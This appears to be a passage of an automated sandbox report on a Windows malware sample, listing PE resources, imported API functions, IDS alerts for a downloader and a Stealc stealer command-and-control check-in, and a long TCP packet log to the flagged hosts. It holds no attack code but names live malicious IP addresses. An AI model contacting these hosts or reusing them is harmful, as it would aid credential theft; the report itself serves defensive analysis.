RT_ICON	0x738d8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Tamil	India	0.8032157676348548
RT_ICON	0x738d8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Tamil	Sri Lanka	0.8032157676348548
RT_ICON	0x75e80	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Tamil	India	0.8634751773049646
RT_ICON	0x75e80	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Tamil	Sri Lanka	0.8634751773049646
RT_STRING	0x76570	0x190	data	Tamil	India	0.4975
RT_STRING	0x76570	0x190	data	Tamil	Sri Lanka	0.4975
RT_STRING	0x76700	0x4b4	data	Tamil	India	0.4476744186046512
RT_STRING	0x76700	0x4b4	data	Tamil	Sri Lanka	0.4476744186046512
RT_ACCELERATOR	0x76318	0x50	data	Tamil	India	0.825
RT_ACCELERATOR	0x76318	0x50	data	Tamil	Sri Lanka	0.825
RT_GROUP_ICON	0x762e8	0x30	data	Tamil	India	0.9375
RT_GROUP_ICON	0x762e8	0x30	data	Tamil	Sri Lanka	0.9375
RT_VERSION	0x76368	0x204	data			0.5445736434108527

Imports

DLL	Import
KERNEL32.dll	InterlockedCompareExchange, WriteConsoleInputA, SetComputerNameW, GetModuleHandleW, EnumCalendarInfoExW, EscapeCommFunction, EnumTimeFormatsA, TlsSetValue, GetVolumeInformationA, LoadLibraryW, GetCalendarInfoW, GetFileAttributesW, SetComputerNameExW, FindNextVolumeMountPointW, GetDevicePowerState, GetShortPathNameA, LCMapStringA, InterlockedExchange, GetLogicalDriveStringsA, GetCurrentProcess, SetLastError, GetProcAddress, VirtualAlloc, BackupWrite, CreateJobSet, GetTempFileNameA, LoadLibraryA, InterlockedExchangeAdd, GlobalWire, EnumDateFormatsA, FreeEnvironmentStringsW, GetCurrentDirectoryA, OpenEventW, SetCalendarInfoA, GetDiskFreeSpaceExA, GetVersionExA, ReadConsoleInputW, SetFileAttributesW, EnumCalendarInfoW, InterlockedDecrement, GetLastError, GetComputerNameA, CreateFileA, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, HeapAlloc, EnterCriticalSection, LeaveCriticalSection, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, DeleteCriticalSection, TerminateProcess, IsDebuggerPresent, HeapFree, Sleep, ExitProcess, WriteFile, GetModuleFileNameA, SetFilePointer, CloseHandle, GetModuleFileNameW, GetEnvironmentStringsW, GetCommandLineW, TlsGetValue, TlsAlloc, TlsFree, InterlockedIncrement, GetCurrentThreadId, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RtlUnwind, RaiseException, HeapReAlloc, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, WideCharToMultiByte, InitializeCriticalSectionAndSpinCount, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, GetModuleHandleA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, HeapSize, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW
GDI32.dll	DeleteMetaFile
ADVAPI32.dll	ReadEventLogW
ole32.dll	CoSuspendClassObjects
WINHTTP.dll	WinHttpCheckPlatform

Possible Origin

Language of compilation system	Country where language is spoken	Map
Tamil	India
Tamil	Sri Lanka

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-11T08:56:58.156182+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49704	104.21.56.70	443	TCP
2024-12-11T08:56:59.719972+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49705	176.113.115.19	80	TCP
2024-12-11T08:57:03.819129+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	49706	92.255.57.89	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 11, 2024 08:56:56.279066086 CET	49704	443	192.168.2.5	104.21.56.70
Dec 11, 2024 08:56:56.279088974 CET	443	49704	104.21.56.70	192.168.2.5
Dec 11, 2024 08:56:56.279201031 CET	49704	443	192.168.2.5	104.21.56.70
Dec 11, 2024 08:56:56.287928104 CET	49704	443	192.168.2.5	104.21.56.70
Dec 11, 2024 08:56:56.287945986 CET	443	49704	104.21.56.70	192.168.2.5
Dec 11, 2024 08:56:57.509380102 CET	443	49704	104.21.56.70	192.168.2.5
Dec 11, 2024 08:56:57.509538889 CET	49704	443	192.168.2.5	104.21.56.70
Dec 11, 2024 08:56:57.563364029 CET	49704	443	192.168.2.5	104.21.56.70
Dec 11, 2024 08:56:57.563384056 CET	443	49704	104.21.56.70	192.168.2.5
Dec 11, 2024 08:56:57.563646078 CET	443	49704	104.21.56.70	192.168.2.5
Dec 11, 2024 08:56:57.563705921 CET	49704	443	192.168.2.5	104.21.56.70
Dec 11, 2024 08:56:57.565856934 CET	49704	443	192.168.2.5	104.21.56.70
Dec 11, 2024 08:56:57.607337952 CET	443	49704	104.21.56.70	192.168.2.5
Dec 11, 2024 08:56:58.156198978 CET	443	49704	104.21.56.70	192.168.2.5
Dec 11, 2024 08:56:58.156280041 CET	443	49704	104.21.56.70	192.168.2.5
Dec 11, 2024 08:56:58.156306028 CET	49704	443	192.168.2.5	104.21.56.70
Dec 11, 2024 08:56:58.156337976 CET	49704	443	192.168.2.5	104.21.56.70
Dec 11, 2024 08:56:58.158834934 CET	49704	443	192.168.2.5	104.21.56.70
Dec 11, 2024 08:56:58.158854008 CET	443	49704	104.21.56.70	192.168.2.5
Dec 11, 2024 08:56:58.158884048 CET	49704	443	192.168.2.5	104.21.56.70
Dec 11, 2024 08:56:58.158919096 CET	49704	443	192.168.2.5	104.21.56.70
Dec 11, 2024 08:56:58.278048992 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:56:58.397377968 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:56:58.397525072 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:56:58.397805929 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:56:58.518168926 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:56:59.719868898 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:56:59.719887972 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:56:59.719934940 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:56:59.719971895 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:56:59.719985962 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:56:59.719999075 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:56:59.720035076 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:56:59.720035076 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:56:59.720035076 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:56:59.720134974 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:56:59.720149994 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:56:59.720168114 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:56:59.720180988 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:56:59.720180988 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:56:59.720196009 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:56:59.720204115 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:56:59.720222950 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:56:59.720256090 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:56:59.839615107 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:56:59.839683056 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:56:59.839696884 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:56:59.839735031 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:56:59.843591928 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:56:59.843642950 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:56:59.843672991 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:56:59.843688011 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:56:59.958905935 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:56:59.958919048 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:56:59.959053993 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:56:59.962838888 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:56:59.962852955 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:56:59.962934017 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.078306913 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.078325987 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.078337908 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.078351021 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.078362942 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.078376055 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.078387976 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.078402042 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.078413010 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.078423977 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.078429937 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.078434944 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.078447104 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.078450918 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.078464031 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.078522921 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.078526020 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.078536987 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.078564882 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.078568935 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.078587055 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.078588963 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.078598976 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.078610897 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.078610897 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.078627110 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.078646898 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.078655958 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.104592085 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.104671955 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.104712009 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.104757071 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.107853889 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.107917070 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.109142065 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.109190941 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.109271049 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.109338045 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.116399050 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.116477966 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.116512060 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.116555929 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.197881937 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.197918892 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.197977066 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.198000908 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.201437950 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.201492071 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.201529980 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.201586962 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.208673000 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.208730936 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.208767891 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.208812952 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.215877056 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.215934038 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.215975046 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.216021061 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.222737074 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.222805977 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.222842932 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.222886086 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.229577065 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.229639053 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.229715109 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.229754925 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.236471891 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.236541033 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.236568928 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.236612082 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.243305922 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.243391991 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.243432045 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.243474007 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.248761892 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.248819113 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.248882055 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.248922110 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.253902912 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.253978968 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.253993988 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.254029036 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.259154081 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.259218931 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.259236097 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.259277105 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.264275074 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.264349937 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.264357090 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.264399052 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.269486904 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.269536018 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.269615889 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.269655943 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.274714947 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.274774075 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.296335936 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.296392918 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.296652079 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.296693087 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.298923969 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.298990011 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.298995018 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.299042940 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.304836035 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.304893970 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.306601048 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.306659937 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.306672096 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.306713104 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.311908960 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.311988115 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.312019110 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.312063932 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.317852974 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.317913055 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.317943096 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.317997932 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.322706938 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.322786093 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.322789907 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.322829962 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.326735973 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.326802969 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.326839924 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.326878071 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.331964970 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.332020044 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.332153082 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.332201958 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.337093115 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.337188959 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.337251902 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.337301970 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.342245102 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.342304945 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.342340946 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.342382908 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.347498894 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.347551107 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.347579956 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.347596884 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.352632046 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.352691889 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.352758884 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.352802038 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.357827902 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.357878923 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.357949018 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.357995987 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.362977982 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.363060951 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.363092899 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.363132954 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.368156910 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.368242979 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.368310928 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.368357897 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.373344898 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.373405933 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.373420000 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.373450994 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.378567934 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.378673077 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.378674984 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.378716946 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.383719921 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.383795023 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.383846045 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.383897066 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.388571024 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.388636112 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.388675928 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.388744116 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.393306017 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.393373966 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.393394947 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.393441916 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.397850037 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.397913933 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.397943020 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.397989988 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.401981115 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.402040005 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.402060986 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.402121067 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.406068087 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.406194925 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.406224012 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.406419039 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.410180092 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.410259962 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.410265923 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.410309076 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.414475918 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.414587975 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.414685011 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.414685011 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.418699026 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.418756008 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.418766022 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.418798923 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.488281965 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.488384008 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.488459110 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.488507986 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.489348888 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.489403963 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.489434004 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.489476919 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.491422892 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.491476059 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.491493940 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.491539955 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.493613958 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.493659973 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.493671894 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.493711948 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.495631933 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.495691061 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.495692015 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.495729923 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.497791052 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.497833014 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.497869015 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.497910976 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.499778032 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.499850988 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.499881983 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.499921083 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.501848936 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.501892090 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.501948118 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.501992941 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.503902912 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.503951073 CET	49705	80	192.168.2.5	176.113.115.19
